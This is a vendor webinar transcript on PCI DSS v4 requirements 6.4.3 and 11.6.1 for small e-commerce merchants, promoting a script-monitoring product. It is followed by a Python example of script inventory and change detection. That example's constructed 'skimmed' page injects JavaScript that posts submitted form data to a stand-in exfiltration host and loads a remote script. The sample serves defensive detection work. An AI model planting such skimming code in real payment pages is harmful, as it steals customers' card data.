SMB Ecommerce Security Basics for New PCI Requirements

Watch this to learn the fundamentals of new PCI v4 requirements, such as PCI requirements 6.4.3 and 11.6.1.

In this webinar, SecurityMetrics' Jameson Olsen and David Salazar will discuss the fundamentals of new PCI v4 requirements, including:

  • Information about 6.4.3 and 11.6.1
  • Payment page security best practices
  • How SecurityMetrics can help your ecom business become compliant without significant additional work

Transcript of SMB Ecommerce Security Basics for New PCI Requirements

Jameson: Hey everyone, welcome to the webinar. Thank you for joining us today. My name is Jameson Olsen. I am the product marketing manager here at SecurityMetrics. Today I'm joined by David Salazar, our director of SMB sales operations. We're going to clarify and simplify some e-commerce security basics for SMB merchants who need to comply with the new PCI requirements for e-com merchants.

We'll start by going over some basic questions. Some merchants have a decent understanding of how their website works, but others, they may have just had an idea for a product they wanted to sell and are using some form of payment platform to make it easy to run their business. You might not know what's going on with these new PCI requirements. We're going to try to outline everything for you as simply as we can today, and make sure that we're all on the same page.

First, what is e-skimming? It's a term that has become more prominent as e-skimming threats have grown year over year recently.

The easiest way to think about it is this: You've heard news stories about an ATM where someone puts a little device that covers the place where you put your card, and it's skimming your information as you use it. E-skimming is that exact same process for your website. They're not hacking into your website to try to get your information; they're trying to use your website as a platform where they can steal your customers' information.

There's also the question of what payment page am I using. Are there different implications based on which one I'm using?

David: It can get complicated knowing what type of e-commerce page you have.

Jameson: Yes. There are several different categories. One is where it's built into your application like Amazon, where everything is handled inside your own application. Probably the most common for merchants like yourselves is having an iframe where you have a third-party payment processor built into your website, maybe Stripe or something like that. The third option is the redirect. PayPal is probably the greatest example, where they click it and it takes them off your site to the third party where the transaction is completed.

David: Sometimes we see customers that have all three options on their web page. It can get confusing, understanding what you need to do to become PCI compliant or what security standards to implement on your website. That's where we come into play. We can help you establish the right standards for your website, your business, and help you keep it secure.

Jameson: Yes, that's a great point. It can be very complicated to figure out. We're happy to help you figure out what type of payment page you're using and what you need to do to be compliant with these new PCI requirements. So, David, can you explain to us what these new requirements are that are impacting e-commerce merchants?

David: Yes, there are a lot of questions recently around 6.4.3 and 11.6.1. We're still learning a lot about it here at SecurityMetrics with our customers and all the websites we see daily, but basically 6.4.3 is asking you to create a log of every script on your payment page. Doing that yourself probably becomes really difficult, especially if you don't have a connection with your web developer or an IT person on staff. We have tools that can help you simplify that and make it really easy for you. Then we have 11.6.1, and this is probably the one we get the most questions about. What does that mean? It's regularly monitoring your page to notice any changes. Is someone tampering with my website? Is someone changing the code on my website?

Jameson: So essentially 6.4.3 is saying you need to know everything that is currently on your payment page in terms of scripts and third-party scripts especially. Then 11.6.1 is saying you need to pay attention to whatever changes from that baseline that you've established in 6.4.3.

David: Yes. Is a new script being injected? Has something new been added? We will always check against the original baseline and monitor for any changes just to give a merchant or business owner a heads up that something's different. Check it out. Let's see how we can help you.

Jameson: How does a site look before and after it has been skimmed by an attacker?

David: Good question. Threat actors are trying to go unnoticed. The website looks the same both before and after. It's really hard to monitor. They've gotten really smart. They go in there, lift information, and leave. No one ever knows. It's really hard to catch that and see those changes happen live. We have our tools like Shopping Cart Inspect or Shopping Cart Monitor that can indicate, "Hey, your website's outdated. It might be vulnerable to some sort of attack or threat, or, hey, your JavaScript files are old. Let's update those and get your website healthy again."

Jameson: Gotcha. It's funny how, it's been decades since the internet and things like a computer virus came around, but I still have this conception that things are going to operate worse, like it's going to be slower, it's going to be impacted. But that's the opposite of the goal of an attacker. Their goal is to let you not even notice that anything has happened, because that means they're in your system longer, collecting more data from your customers.

David: You're right. They don't want to be caught. They're very strategic. They choose good times and go in there, compromise a website, get customer information, and then they can leave with no trace of them ever being on the website. It's very difficult for someone with limited tools to be able to see a threat actor on their website.

Jameson: It's not something you're just going to notice browsing your web page. Let's dive a little bit more into… I mentioned when we were going through the different types of payment pages, I mentioned how iframes are probably the most common for merchants of this size. Are iframes not the gold standard anymore? Is there a problem with using an iframe?

David: No problems using an iframe. No problem using any other method you might want to use on your website. Iframes are still a great tool and one of the gold standards. We've been seeing a lot recently with some of the scanning we've been doing on websites that it might take a little bit more to make us more secure these days. We're seeing a lot of things like old operating systems, missing security patches or updates, old software, open ports, and previous PCI standards. We were really not worried about that in the past, but things evolve. We've been able to scan a few websites with iframes, and we've noticed a couple of these things. I think it's a good time to pay extra attention to iframes and put some really easy tools to work, like our vulnerability scanning or our Shopping Cart Monitor tools, just to triple-check that your iframe is working how it should be and you're keeping your customers' data secure.

Jameson: Because that is the ultimate goal with these requirements. Obviously the PCI Council wants to protect your business, but they also are very concerned with your customers' data. That's why this skimming has become such a concern. What are these threat actors that are coming after small businesses? If I'm a small business, I'm thinking I don't have all the money of a big enterprise or some massive company, why am I a target?

David: Usually, they're a target because they're smaller and easier. A lot of times, small to medium businesses are relying on other people to keep their websites secure or their business environment secure. We see ransomware groups, any criminal group, nation-state adversaries, hacktivists; they're always trying to target the small guy because they know there might not be as much security there as at a big corporation.

Jameson: You are a target as a small business. If you put effort into trying to protect yourself, you're not big enough for them to go to the trouble of working around the protections you've put in place.

David: Yeah.

Jameson: Okay. A very common question we get, David, at all levels is, "But my platform says I'm compliant. Why do I still need to fulfill these requirements?"

David: That's a great question. They weren't there in the past. They're being established on April 1st of this year. While it wasn't required for compliance previously, it is now. Often we have the ability to customize our websites, add scripts, add sales, add coupons. Some of that stuff we haven't maybe authorized through our vendors or we're using code we found on the internet, and that could cause some vulnerabilities to the website. That's probably not the biggest reason. We're seeing a lot of different types of e-commerce platforms these days, with a lot of different ways to accept payments. We're getting a little more diverse through e-commerce. That's one of the big reasons we want websites to be more secure. We've noticed a big trend in our customers that didn't have an e-commerce solution previously. Now they do, and a lot of times they don't know how it operates or when it was last updated.

Jameson: It almost feels like a bait and switch. If you want to be in e-commerce, there are tools that make it so easy to launch your e-comm business. But then it comes around to things like PCI compliance, and all of a sudden it's, wait, I don't know what I'm supposed to be doing here. Which is why, as you've hinted at already, we create our products from the ground up thinking about the merchant experience and trying to make it as simple as possible, because we know this is not your background. This is not what you spend your time doing. To then suddenly expect you to act like an IT director is a big ask. We're trying to create as low a barrier to entry as we can for you to be PCI compliant. Can you talk to us about how Shopping Cart Monitor specifically has been designed with that goal in mind, to meet these new e-comm requirements?

David: Yes. If you don't know what you're doing, it's pretty hard to do this on your own. Often merchants rely on their providers to do some of this work for them, and that can be tough: they have millions of customers, thousands of people they're looking after. So our tool is really easy. All we need is your website URL or your payment page URL, and then we do the work. With Shopping Cart Monitor, we're looking at: has anything changed with my website? Did I do that? Did somebody else do that? We're looking at common vulnerabilities. We're looking at the scripts that are running, and we're doing that in real time while we're testing that payment page with our expertise and our 25-plus years in data security, where we know exactly what we're looking for, to make it as easy as possible for merchants to pull up their report and know what's going on with their website.

Jameson: Okay. You mentioned that with our solution, all we need is your URL. We don't need any sort of code. Can you talk a little bit more about why that is important to making this experience as easy as possible?

David: Yes. We're really excited that we have a cloud-based solution. What that means is you don't need to install code on your website. You don't need an agent on your website. All we need is your URL, and we're able to do that with our cloud-based solution and basically act like another customer on your website, run through a payment page, get the experience we need, and be able to show you the results based on what we've seen. That's pretty cool, because it's kind of like a threat actor: they're invisible a lot of the time, and so are we. We can't be detected. We're trying to keep this process simple for the merchant and for us, and I think that's something pretty unique that we're able to offer. A lot of times when getting a new tool, we're trying to figure out all the ins and outs, how to make it work, and often we give up on that because we don't want to use it anymore. We don't want to go through all of that. We want to eliminate all of that and make it as simple as possible for a small business owner to focus on what they should be doing: running their business.

Jameson: Because there are solutions out there for these requirements that are not cloud-based; you do have to install code. I was talking with the product manager here over Shopping Cart Monitor. I'm a huge visuals guy; I love to come up with visual comparisons. So we were talking about how, with a code-based solution, let's imagine your website is a wall that you're guarding, and the attackers are trying to sneak in at night. A code-based solution is like a spotlight: you can find them, but they can also see the spotlight. So if they're smart enough, they can avoid it, because that code is a footprint on your website that they can notice and maybe circumvent or even disable. But a cloud-based solution is like night vision goggles: we can see them, but they have no clue. They can't find us on the website.

David: Yes, very true.

Jameson: So it's a very secure option to meet these compliance requirements, and that visual clicked things into place for me in understanding why cloud-based is so advantageous in our opinion.

David: Yes. And for me, it's great to have an option where I don't have to do extra work. I don't need to install something on my website or put in a new line of code. I know that with my URL, SecurityMetrics can run their Shopping Cart Monitor and I get the results that I need. I think that's great. Threat actors are putting a lot of work into being undetectable, and we're putting a lot of work into being undetectable and being able to locate those threats when they're happening.

Jameson: Yes. One other point to bring up with this: our Shopping Cart Monitor has been built into our overall PCI solution. If you're doing your SAQ through SecurityMetrics and you add Shopping Cart Monitor to the package, it's the same portal. You're not having to go and get a report to then submit to some other SAQ offering. It's just one streamlined experience, because again, who has the time to deal with getting this report and delivering it over there? We just want to offer you the one-stop shop for SMB PCI compliance.

David: Yes, I love it, because you can log in just how you're used to every single year, or every month when you're checking your vulnerability scans, and you'll see Shopping Cart Monitor in our menu. You can click on that, look at your current report or a previous report, maybe see any work that's outstanding and try to address that. And if you're not quite understanding what you need to do or what these things mean, guess what? We have our award-winning support department that you can call basically any time and get some clarification on what that script is, how it's impacting your website, and maybe what you can do to remediate that.

Jameson: I'm glad you brought that up, because I was going to say I can hear a customer maybe saying, "Oh, you say it's easy to use, but I'll find a way to find it complicated." We have our industry-leading support team who are available to walk you through where you're hung up and make sure that you get compliant without the headaches. We're very proud of our team: you're talking to a human in seconds. There's no massive phone tree that you have to navigate just to get connected to a human. We want to get you back on the path to reaching compliance as fast as possible. David, is there anything else you want to say about Shopping Cart Monitor and why it's such a great way to meet these requirements?

David: Yes, I think the ease of use. I know nothing about how to set up an iframe or a payment button, and if I'm doing that for my business, I would want to know how to keep that secure in a very simple manner. So I think just the ease of use, how easy it is to understand my reports, and the support behind it really make me excited about this product and how it can help anybody, with a technical background or a non-technical background. Shopping Cart Monitor is made for everyone.

Jameson: Yes. I think the last thing I'd say about it is that we've been doing data security for 25 years now, and we have been working on this specific product for a long time. We started developing Shopping Cart Monitor and Shopping Cart Inspect in 2018. So even though this deadline wasn't coming into play until 2025, we've been honing our offering to make sure that it is effective, it's secure, and it's easy to use.

David: Yes. Like you're saying, we have a lot of experience; we've been honing this since 2018. We've probably seen everything out there, the common vulnerabilities and the rare ones. That's another reason I'm excited about Shopping Cart Monitor. We're using all the data we've had previously and applying it to a new product, so that, based on our 25 years of experience, I think we're going to see some awesome things and we're really going to help people keep their e-commerce platform secure.

Jameson: Excellent. David, thank you for joining this conversation today. We hope we've been able to answer some questions that you've had, and as always, if you have ones we didn't address, reach out. There are links below where you can contact us. We'll also link to the product page to learn more about Shopping Cart Monitor. Our number one goal is just to make the new requirements as painless to address as possible. PCI can get complicated; our goal is to make it as simple as we can for you, the merchant, so you can focus on what you care about the most. So, send us any questions you have, and thank you for joining us. We're excited to help you be PCI compliant.
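The two checks David describes in the webinar, an inventory of every script on the payment page (6.4.3) and a comparison of the live page against that baseline so that anything injected or altered raises an alert (11.6.1), can be sketched in code. The example below is added here for illustration; it is not part of the webinar and is not SecurityMetrics' Shopping Cart Monitor. The two HTML pages, the `example-psp.test` and `example-exfil.test` hostnames, and the `integrity` placeholder are all constructed for the example.

```python
"""Payment-page script inventory (6.4.3) and baseline change detection (11.6.1).

Added illustration, not code from the webinar or from any vendor product.
Both HTML documents below are constructed samples with hypothetical hosts.
"""
import hashlib
import json
from html.parser import HTMLParser

# Constructed payment page, recorded as the 6.4.3 baseline: one external
# processor script (with an SRI integrity attribute, placeholder digest) and
# one inline configuration script next to the card-entry iframe.
BASELINE_HTML = """<html><body>
<script src="https://js.example-psp.test/v3/checkout.js"
        integrity="sha384-PLACEHOLDER"></script>
<script>window.checkoutConfig = {merchant: "demo-store"};</script>
<iframe src="https://pay.example-psp.test/frame" title="card entry"></iframe>
</body></html>
"""

# Same page after a constructed skimming-style change: the inline script now
# also posts the submitted form to an attacker host, and a new third-party
# script has been appended. Nothing visible to a shopper changes.
SKIMMED_HTML = BASELINE_HTML.replace(
    '{merchant: "demo-store"};',
    '{merchant: "demo-store"}; document.addEventListener("submit", '
    'e => fetch("https://cdn.example-exfil.test/c", {method: "POST", '
    'body: new FormData(e.target)}));',
).replace(
    "</body>",
    '<script src="https://cdn.example-exfil.test/loader.js"></script>\n</body>',
)


class ScriptCollector(HTMLParser):
    """Record every <script>: external ones by src (plus any integrity attribute),
    inline ones by the SHA-256 of their body, so edits to inline code are visible."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._inline = None  # data chunks while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append({"kind": "external", "src": a["src"],
                                 "integrity": a.get("integrity")})
        else:
            self._inline = []

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline).strip().encode()
            self.scripts.append({"kind": "inline",
                                 "sha256": hashlib.sha256(body).hexdigest()})
            self._inline = None


def inventory(html):
    """6.4.3-style inventory: every script present on the payment page."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return p.scripts


def detect_changes(baseline, current):
    """11.6.1-style check: scripts added to or removed from the baseline.
    A modified inline script appears as one removal plus one addition
    because its hash changed."""
    def key(s):
        return json.dumps(s, sort_keys=True)
    base, cur = {key(s) for s in baseline}, {key(s) for s in current}
    added = [json.loads(k) for k in sorted(cur - base)]
    removed = [json.loads(k) for k in sorted(base - cur)]
    return added, removed


if __name__ == "__main__":
    baseline = inventory(BASELINE_HTML)
    added, removed = detect_changes(baseline, inventory(SKIMMED_HTML))
    for s in added:
        print("ALERT new or changed script:", s)
    for s in removed:
        print("ALERT baseline script missing or altered:", s)
```

Two caveats a practitioner would add before relying on something like this. Only inline scripts are hashed here; an externally hosted script can change on its host without the page's markup changing, so the fetched script bodies (or SRI enforcement) need to be part of the baseline too. And the check should run against the page as a shopper's browser receives it, including the security-relevant HTTP headers and any scripts added at runtime, rather than against the server's templates alone, because that is the copy a skimmer tampers with.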
